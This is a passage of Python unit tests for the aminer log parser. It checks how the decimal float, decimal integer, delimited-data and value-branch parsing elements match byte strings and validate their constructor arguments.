        self.compare_no_match_results(data, match_element, match_context)

        # Sign separated from the digits by a blank is rejected here (no exponent present).
        data = b"+ 22.25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

        data = b"- 22.25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

        # A comma is not a decimal separator: the match stops before it and yields +22.
        data = b"+22,25"
        value = b"+22"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None)

        data = b"22,25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

        data = b"22.12.2021 some string."
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

        data = b".25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

        # Blank before the sign is not accepted padding.
        data = b" +25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

        data = b" -25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

        # Zero padding is not accepted with PAD_TYPE_BLANK.
        data = b"025"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

        data = b"0025"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

        # An exponent without a mantissa.
        data = b"e+10"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

        data = b"00"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

    def test7element_id_input_validation(self):
        """Check if element_id is validated: only a non-empty str is accepted."""
        self.assertRaises(ValueError, DecimalFloatValueModelElement, "")  # empty element_id
        self.assertRaises(TypeError, DecimalFloatValueModelElement, None)  # None element_id
        self.assertRaises(TypeError, DecimalFloatValueModelElement, b"path")  # bytes element_id is not allowed
        self.assertRaises(TypeError,
DecimalFloatValueModelElement, True) # bool element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, 123) # integer element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, 123.22) # float element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, {"id": "path"}) # dict element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, ["path"]) # list element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, []) # empty list element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, ()) # empty tuple element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, set()) # empty set element_id is not allowed def test8value_sign_type_input_validation(self): """Check if value_sign_type is validated.""" DecimalFloatValueModelElement(self.id_, value_sign_type="none") DecimalFloatValueModelElement(self.id_, value_sign_type="optional") DecimalFloatValueModelElement(self.id_, value_sign_type="mandatory") self.assertRaises(ValueError, DecimalFloatValueModelElement, self.id_, value_sign_type="None") self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=None) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=b"none") self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=True) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=123) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=123.22) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type={"value_sign_type": "none"}) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=["none"]) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=[]) self.assertRaises(TypeError, 
DecimalFloatValueModelElement, self.id_, value_sign_type=()) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=set()) def test9value_pad_type_input_validation(self): """Check if value_pad_type is validated.""" DecimalFloatValueModelElement(self.id_, value_pad_type="none") DecimalFloatValueModelElement(self.id_, value_pad_type="zero") DecimalFloatValueModelElement(self.id_, value_pad_type="blank") self.assertRaises(ValueError, DecimalFloatValueModelElement, self.id_, value_pad_type="None") self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=None) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=b"none") self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=True) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=123) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=123.22) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type={"value_sign_type": "none"}) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=["none"]) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=[]) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=()) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=set()) def test10exponent_type_input_validation(self): """Check if exponent_type is validated.""" DecimalFloatValueModelElement(self.id_, exponent_type="none") DecimalFloatValueModelElement(self.id_, exponent_type="optional") DecimalFloatValueModelElement(self.id_, exponent_type="mandatory") self.assertRaises(ValueError, DecimalFloatValueModelElement, self.id_, exponent_type="None") self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=None) self.assertRaises(TypeError, DecimalFloatValueModelElement, 
self.id_, exponent_type=b"none") self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=True) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=123) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=123.22) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type={"value_sign_type": "none"}) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=["none"]) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=[]) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=()) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=set()) def test11get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = DecimalFloatValueModelElement(self.id_) data = b"123.22" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) 
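self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/DecimalIntegerValueModelElementTest.py000066400000000000000000000631661500476301700330130ustar00rootroot00000000000000
import unittest
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.MatchElement import MatchElement
from unit.TestBase import TestBase, DummyMatchContext


class DecimalIntegerValueModelElementTest(TestBase):
    """Unittests for the DecimalIntegerValueModelElement.

    Every parsing case is a (data, match_string, match_object) triple that is fed to get_match_element()
    through a fresh DummyMatchContext; a None match_string means the element must NOT match.  Log data is
    normally attacker-influenced, so the no-match cases matter as much as the positive ones: they pin down
    which byte sequences the parser refuses (leading blanks, leading zeros, a bare "." or exponent, a sign
    in the wrong mode).  Relaxing any of them silently widens what downstream detectors accept as a number.

    Method numbering skips test8 in the original file; the names are kept unchanged so existing test
    selections keep working.
    """

    id_ = "integer"
    path = "path"

    # Values of the wrong type for the string-typed constructor parameters (value_sign_type / value_pad_type).
    _non_string_values = (None, b"none", True, 123, 123.22, {"value_sign_type": "none"}, ["none"], [], (), set())

    def _check_cases(self, model_element, cases):
        """Run every case through model_element and compare the outcome with the expectation.

        @param model_element the DecimalIntegerValueModelElement under test.
        @param cases iterable of (data, match_string, match_object). match_string None means "must not match";
               otherwise match_string is the consumed bytes and match_object the parsed integer.
        """
        for data, match_string, match_object in cases:
            with self.subTest(data=data):
                match_context = DummyMatchContext(data)
                match_element = model_element.get_match_element(self.path, match_context)
                if match_string is None:
                    self.compare_no_match_results(data, match_element, match_context)
                else:
                    self.compare_match_results(
                        data, match_element, match_context, self.id_, self.path, match_string, match_object, None)

    def test1get_match_element_default_values(self):
        """Test valid integer values with default values of value_sign_type and value_pad_type."""
        decimal_integer_value_me = DecimalIntegerValueModelElement(
            self.id_, DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
        self._check_cases(decimal_integer_value_me, [
            (b"22.25 some string.", b"22", 22),  # only the integer part before the "." is consumed
            (b"0.25 some string.", b"0", 0),
            (b"22 some string.", b"22", 22),
            (b"22.12.2021 some string.", b"22", 22),
            (b"22. some string", b"22", 22),
            (b"0 some string", b"0", 0),
        ])

    def test2get_match_element_default_values_no_match(self):
        """Test values that do not match, or only match partially, with default value_sign_type and value_pad_type.

        Entries with a match string are partial matches: the element consumes a leading integer and leaves the rest.
        """
        decimal_integer_value_me = DecimalIntegerValueModelElement(
            self.id_, DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
        self._check_cases(decimal_integer_value_me, [
            (b"+22.25", None, None),  # no sign allowed in SIGN_TYPE_NONE
            (b"-22.25", None, None),
            (b"22,25", b"22", 22),
            (b".25", None, None),
            (b"025", None, None),  # leading zero rejected in PAD_TYPE_NONE
            (b"0025", None, None),
            (b" 25", None, None),  # leading blank rejected in PAD_TYPE_NONE
            # NOTE(review): this entry is a duplicate of the previous one in the source; one of them may
            # originally have carried a different amount of leading whitespace - confirm against upstream.
            (b" 25", None, None),
            (b"1e-5", b"1", 1),  # exponent is not part of an integer, "1" is consumed
            (b"e+10", None, None),
            (b"1e+0", b"1", 1),
            (b"00", None, None),
            (b"no number 22 some string.", None, None),
        ])

    def test3get_match_element_optional_zero_values(self):
        """Test valid integer values with "optional" value_sign_type and "zero" value_pad_type."""
        decimal_integer_value_me = DecimalIntegerValueModelElement(
            self.id_, DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL, DecimalIntegerValueModelElement.PAD_TYPE_ZERO)
        self._check_cases(decimal_integer_value_me, [
            (b"22.25 some string.", b"22", 22),
            (b"-22.25 some string.", b"-22", -22),
            (b"0.25 some string.", b"0", 0),
            (b"22 some string.", b"22", 22),
            (b"22.12.2021 some string.", b"22", 22),
            (b"22. some string", b"22", 22),
            (b"025 some string", b"025", 25),  # zero padding is consumed but not part of the value
            (b"0025 some string", b"0025", 25),
            (b"0025.22 some string", b"0025", 25),
            (b"1e-5 some string", b"1", 1),
            (b"1e+0 some string", b"1", 1),
            (b"0 some string", b"0", 0),
            (b"00 some string", b"00", 0),
        ])

    def test4get_match_element_optional_zero_values_no_match(self):
        """Test values that do not match, or only match partially, with "optional" value_sign_type and "zero" value_pad_type."""
        decimal_integer_value_me = DecimalIntegerValueModelElement(
            self.id_, DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL, DecimalIntegerValueModelElement.PAD_TYPE_ZERO)
        self._check_cases(decimal_integer_value_me, [
            (b"+22.25", None, None),  # "+" is not accepted as an optional sign here
            (b"22,25", b"22", 22),
            (b".25", None, None),
            (b" 25", None, None),
            # NOTE(review): duplicate of the previous entry in the source - see test2.
            (b" 25", None, None),
            (b"e+10", None, None),
            (b"no number 22 some string.", None, None),
        ])

    def test5get_match_element_mandatory_blank_values(self):
        """Test valid integer values with "mandatory" value_sign_type and "blank" value_pad_type."""
        decimal_integer_value_me = DecimalIntegerValueModelElement(
            self.id_, DecimalIntegerValueModelElement.SIGN_TYPE_MANDATORY, DecimalIntegerValueModelElement.PAD_TYPE_BLANK)
        self._check_cases(decimal_integer_value_me, [
            (b"+22.25 some string.", b"+22", 22),
            (b"-22.25 some string.", b"-22", -22),
            (b"+0.25 some string.", b"+0", 0),
            (b"+22 some string.", b"+22", 22),
            (b"+22. some string", b"+22", 22),
            (b"+ 25 some string", b"+ 25", 25),  # blank padding between sign and digits is consumed
            (b"- 25 some string", b"- 25", -25),
            (b"+1e-5 some string", b"+1", 1),
            (b"+1e+0 some string", b"+1", 1),
            (b"+ 1e+0 some string", b"+ 1", 1),
            (b"+0 some string", b"+0", 0),
        ])

    def test6get_match_element_mandatory_blank_values_no_match(self):
        """Test values that do not match, or only match partially, with "mandatory" value_sign_type and "blank" value_pad_type."""
        decimal_integer_value_me = DecimalIntegerValueModelElement(
            self.id_, DecimalIntegerValueModelElement.SIGN_TYPE_MANDATORY, DecimalIntegerValueModelElement.PAD_TYPE_BLANK)
        self._check_cases(decimal_integer_value_me, [
            (b"22.25", None, None),  # sign is mandatory
            # NOTE(review): expected not to match although b"+ 25 some string" matches in test5 - confirm the
            # intended semantics of blank padding when the data ends right after the digits.
            (b"+ 22.25", None, None),
            (b"- 22.25", None, None),
            (b"+22,25", b"+22", 22),
            (b"22,25", None, None),
            (b"22.12.2021 some string.", None, None),
            (b".25", None, None),
            (b" +25", None, None),  # blank before the sign is not padding
            (b" -25", None, None),
            (b"025", None, None),
            (b"0025", None, None),
            (b"e+10", None, None),
            (b"00", None, None),
            (b"no number 22 some string.", None, None),
        ])

    def test7element_id_input_validation(self):
        """Check if element_id is validated: empty string -> ValueError, any non-str type -> TypeError."""
        self.assertRaises(ValueError, DecimalIntegerValueModelElement, "")  # empty element_id
        for element_id in (None, b"path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set()):
            with self.subTest(element_id=element_id):
                self.assertRaises(TypeError, DecimalIntegerValueModelElement, element_id)

    def test9value_sign_type_input_validation(self):
        """Check if value_sign_type is validated: only "none", "optional" and "mandatory" are accepted."""
        DecimalIntegerValueModelElement(self.id_, value_sign_type="none")
        DecimalIntegerValueModelElement(self.id_, value_sign_type="optional")
        DecimalIntegerValueModelElement(self.id_, value_sign_type="mandatory")
        self.assertRaises(ValueError, DecimalIntegerValueModelElement, self.id_, value_sign_type="None")  # case-sensitive
        for value_sign_type in self._non_string_values:
            with self.subTest(value_sign_type=value_sign_type):
                self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_sign_type=value_sign_type)

    def test10value_pad_type_input_validation(self):
        """Check if value_pad_type is validated: only "none", "zero" and "blank" are accepted."""
        DecimalIntegerValueModelElement(self.id_, value_pad_type="none")
        DecimalIntegerValueModelElement(self.id_, value_pad_type="zero")
        DecimalIntegerValueModelElement(self.id_, value_pad_type="blank")
        self.assertRaises(ValueError, DecimalIntegerValueModelElement, self.id_, value_pad_type="None")  # case-sensitive
        for value_pad_type in self._non_string_values:
            with self.subTest(value_pad_type=value_pad_type):
                self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_pad_type=value_pad_type)

    def test11get_match_element_match_context_input_validation(self):
        """Check if an exception is raised, when other classes than MatchContext are used in get_match_element."""
        model_element = DecimalIntegerValueModelElement(self.id_)
        data = b"123.22"
        model_element.get_match_element(self.path, DummyMatchContext(data))
        model_element.get_match_element(self.path, MatchContext(data))
        # A MatchElement is built the same way as in DecimalFloatValueModelElementTest (with self.path) so the
        # AttributeError really comes from the missing match context interface, not from the constructor.
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None))
        for match_context in (data, data.decode(), True, 123, 123.22, None, [], {"key": MatchContext(data)}, set(), (), model_element):
            with self.subTest(match_context=match_context):
                self.assertRaises(AttributeError, model_element.get_match_element, self.path, match_context)


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/DelimitedDataModelElementTest.py000066400000000000000000000463611500476301700316300ustar00rootroot00000000000000import unittest from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from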
unit.TestBase import TestBase, DummyMatchContext class DelimitedDataModelElementTest(TestBase): """Unittests for the DelimitedDataModelElement.""" id_ = "delimited" path = "path" delimiter = b"," def test1get_match_element_single_char(self): """A single character is used as delimiter and not consumed (consume_delimiter=False).""" data = b"this is a match context.\n" delimited_data_model_element = DelimitedDataModelElement(self.id_, b"a") value = b"this is " match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"c") value = b"this is a mat" match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"e") value = b"this is a match cont" match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"\n") value = b"this is a match context." 
match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) def test2get_match_element_single_char_no_match(self): """A single character is used as delimiter and not matched.""" data = b"this is a match context.\n" for char in "bdfgjklpqruvwyz": delimited_data_model_element = DelimitedDataModelElement(self.id_, char.encode()) match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3delimiter_string(self): """In this test case a whole string is searched for in the match_data and it is not consumed (consume_delimiter=False).""" data = b"this is a match context.\n" value = b"this" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b" is") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) value = b"th" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"is") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) value = b"this is a match " match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"context.\n") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) value = b"t" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, 
b"his is a match context.\n") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) def test4delimiter_string_no_match(self): """In this test case a whole string is searched for in the match_data with no match.""" data = b"this is a match context.\n" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"other data") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"isa") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"context\n") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"this is a match context.\n") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test5special_characters_escape(self): """In this test case special character escaping is tested. 
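The delimiter is not consumed (consume_delimiter=False)."""
        data = b'error: the command \\"python run.py\\" was not found" '
        value = b'error: the command \\"python run.py\\" was not found'
        match_context = DummyMatchContext(data)
        delimited_data_model_element = DelimitedDataModelElement(self.id_, b'"', b"\\")
        match_element = delimited_data_model_element.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None)
        # The escaped "$" inside the data must not be taken as the delimiter; only the unescaped trailing "$" ends the match.
        data = rb"^This is a simple regex string. It costs 10\$.$"
        value = rb"^This is a simple regex string. It costs 10\$."
        match_context = DummyMatchContext(data)
        delimited_data_model_element = DelimitedDataModelElement(self.id_, b"$", b"\\")
        match_element = delimited_data_model_element.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None)
        # The escape does not have to be a backslash: here a blank escapes the "." of ".gitignore".
        data = b"the searched file is .gitignore."
        value = b"the searched file is .gitignore"
        match_context = DummyMatchContext(data)
        delimited_data_model_element = DelimitedDataModelElement(self.id_, b".", b" ")
        match_element = delimited_data_model_element.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None)

    def test6special_characters_escape_no_match(self):
        """Check special character escaping without a match.

        In every case each occurrence of the delimiter in the data is escaped, so no match may be produced
        and the match context must remain unchanged.
        """
        # (data, delimiter, escape)
        cases = [
            (b'error: the command \\"python run.py\\" was not found\\" ', b'"', b"\\"),
            (rb"^This is a simple regex string. It costs 10\$.\$", b"$", b"\\"),
            (b"the searched file is .gitignore .", b".", b" "),
        ]
        for data, delimiter, escape in cases:
            match_context = DummyMatchContext(data)
            delimited_data_model_element = DelimitedDataModelElement(self.id_, delimiter, escape)
            match_element = delimited_data_model_element.get_match_element(self.path, match_context)
            self.compare_no_match_results(data, match_element, match_context)

    def test7consume_delimiter(self):
        """Check that with consume_delimiter=True the delimiter itself is part of the returned match value."""
        data = b"this is a match context.\n"
        # (delimiter, expected match value); every expected value ends with the delimiter.
        cases = [
            (b"a", b"this is a"),
            (b"c", b"this is a matc"),
            (b"e", b"this is a match conte"),
            (b"\n", b"this is a match context.\n"),
            (b" is", b"this is"),
            (b"is", b"this"),
            (b"context.\n", b"this is a match context.\n"),
            (b"his is a match context.\n", b"this is a match context.\n"),
        ]
        for delimiter, value in cases:
            delimited_data_model_element = DelimitedDataModelElement(self.id_, delimiter, consume_delimiter=True)
            match_context = DummyMatchContext(data)
            match_element = delimited_data_model_element.get_match_element(self.path, match_context)
            self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None)

    def test8consume_delimiter_no_match(self):
        """Check that consume_delimiter=True does not produce a match for delimiters that must not match the data."""
        data = b"this is a match context.\n"
        # Single bytes that do not occur in data at all, followed by multi-byte delimiters that are expected not to match
        # (the last one is identical to the complete input).
        delimiters = [char.encode() for char in "bdfgjklpqruvwyz"]
        delimiters += [b"other data", b"isa", b"context\n", b"this is a match context.\n"]
        for delimiter in delimiters:
            delimited_data_model_element = DelimitedDataModelElement(self.id_, delimiter, consume_delimiter=True)
            match_context = DummyMatchContext(data)
            match_element = delimited_data_model_element.get_match_element(self.path, match_context)
            self.compare_no_match_results(data, match_element, match_context)

    def test9element_id_input_validation(self):
        """Check if element_id is validated: an empty string is a ValueError, any non-str value a TypeError."""
        self.assertRaises(ValueError, DelimitedDataModelElement, "", self.delimiter)  # empty element_id
        # None, bytes, bool, int, float, dict, list, empty list, empty tuple and empty set are not allowed as element_id
        for element_id in (None, b"path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, DelimitedDataModelElement, element_id, self.delimiter)

    def test10escape_input_validation(self):
        """Check if escape is validated: empty bytes are a ValueError, any non-bytes value a TypeError."""
        self.assertRaises(ValueError, DelimitedDataModelElement, self.id_, self.delimiter, escape=b"")  # empty escape
        # str, bool, int, float, dict, list, empty list, empty tuple and empty set are not allowed as escape
        for escape in ("\\", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape=escape)

    def test11consume_delimiter_input_validation(self):
        """Check if consume_delimiter is validated: every non-bool value is a TypeError."""
        for consume_delimiter in (b"", "\\", 123, 123.22, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter=consume_delimiter)

    def test12get_match_element_match_context_input_validation(self):
        """Check if an exception is raised, when other classes than MatchContext are used in get_match_element."""
        model_element = DelimitedDataModelElement(self.id_, self.delimiter)
        data = b"one, two, three"
        # both the test dummy and the real MatchContext are accepted
        model_element.get_match_element(self.path, DummyMatchContext(data))
        model_element.get_match_element(self.path, MatchContext(data))
        invalid_contexts = (
            MatchElement(None, data, None, None), data, data.decode(), True, 123, 123.22, None, [],
            {"key": MatchContext(data)}, set(), (), model_element)
        for match_context in invalid_contexts:
            self.assertRaises(AttributeError, model_element.get_match_element, self.path, match_context)


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/ElementValueBranchModelElementTest.py000066400000000000000000000312041500476301700326340ustar00rootroot00000000000000
import unittest
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.MatchElement import MatchElement
from aminer.parsing.ElementValueBranchModelElement import ElementValueBranchModelElement
from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummyFirstMatchModelElement


class ElementValueBranchModelElementTest(TestBase):
    """Unittests for the ElementValueBranchModelElement."""

    id_ = "value_branch"
    path = "path"
    value_path = "value_model"
    path_path = b"path: "
    data_path = b"data: "
    path_fixed_string = b"/model"
    data_fixed_string = b"this is some random data: 255."
    # value_model yields either "path: " or "data: "; that value selects the branch in branch_model_dict.
    value_model = DummyFirstMatchModelElement(
        "branch", [DummyFixedDataModelElement("path", path_path), DummyFixedDataModelElement("data", data_path)])
    path_me = DummyFixedDataModelElement(value_path, path_fixed_string)
    data_me = DummyFixedDataModelElement(value_path, data_fixed_string)
    children = [value_model, path_me, data_me]

    def test1get_match_element_valid_match(self):
        """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters."""
        element_value_branch_me = ElementValueBranchModelElement(
            self.id_, self.value_model, None, {"path: ": self.path_me, "data: ": self.data_me})
        # (data, expected child MatchElements): the branch child first, then the selected branch model
        cases = [
            (b"path: /model", [
                MatchElement("path/value_branch/branch/path", self.path_path, self.path_path, None),
                MatchElement("path/value_branch/value_model", self.path_fixed_string, self.path_fixed_string, None)]),
            (b"data: this is some random data: 255.", [
                MatchElement("path/value_branch/branch/data", self.data_path, self.data_path, None),
                MatchElement("path/value_branch/value_model", self.data_fixed_string, self.data_fixed_string, None)]),
        ]
        for data, expected_children in cases:
            match_context = DummyMatchContext(data)
            match_element = element_value_branch_me.get_match_element(self.path, match_context)
            self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, expected_children)

    def test2get_match_element_no_match(self):
        """Parse not matching substring from MatchContext and check if the MatchContext was not changed."""
        element_value_branch_me = ElementValueBranchModelElement(
            self.id_, self.value_model, None, {"path: ": self.path_me, "data: ": self.data_me})
        # a branch prefix followed by the wrong branch data, or by nothing at all, must not match
        for data in (b"path: /random", b"path: this is some random data: 255.", b"data: /model", b"path: ", b"data: "):
            match_context = DummyMatchContext(data)
            match_element = element_value_branch_me.get_match_element(self.path, match_context)
            self.compare_no_match_results(data, match_element, match_context)

    def test3element_id_input_validation(self):
        """Check if element_id is validated: an empty string is a ValueError, any non-str value a TypeError."""
        branch_model_dict = {"path: ": self.path_me, "data: ": self.data_me}
        self.assertRaises(ValueError, ElementValueBranchModelElement, "", self.value_model, None, branch_model_dict)
        for element_id in (None, b"path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, ElementValueBranchModelElement, element_id, self.value_model, None, branch_model_dict)

    def test4value_model_input_validation(self):
        """Check if value_model is validated: anything that is not a model element is a TypeError."""
        branch_model_dict = {"path: ": self.path_me, "data: ": self.data_me}
        for value_model in ("path", None, b"path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, value_model, None, branch_model_dict)

    def test5value_path_input_validation(self):
        """Check if value_path is validated: an empty string is a ValueError, any non-str value a TypeError."""
        branch_model_dict = {"path: ": self.path_me, "data: ": self.data_me}
        self.assertRaises(ValueError, ElementValueBranchModelElement, self.id_, self.value_model, "", branch_model_dict)
        for value_path in (b"path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, value_path, branch_model_dict)

    def test6branch_model_dict_input_validation(self):
        """Check if branch_model_dict is validated: every non-dict value is a TypeError."""
        for branch_model_dict in ("path", None, b"path", True, 123, 123.22):
            self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict)
        # dict branch_model_dict without ModelElementInterface values is not allowed
        self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, {"id": "path"})
        for branch_model_dict in (["path"], [], (), set()):
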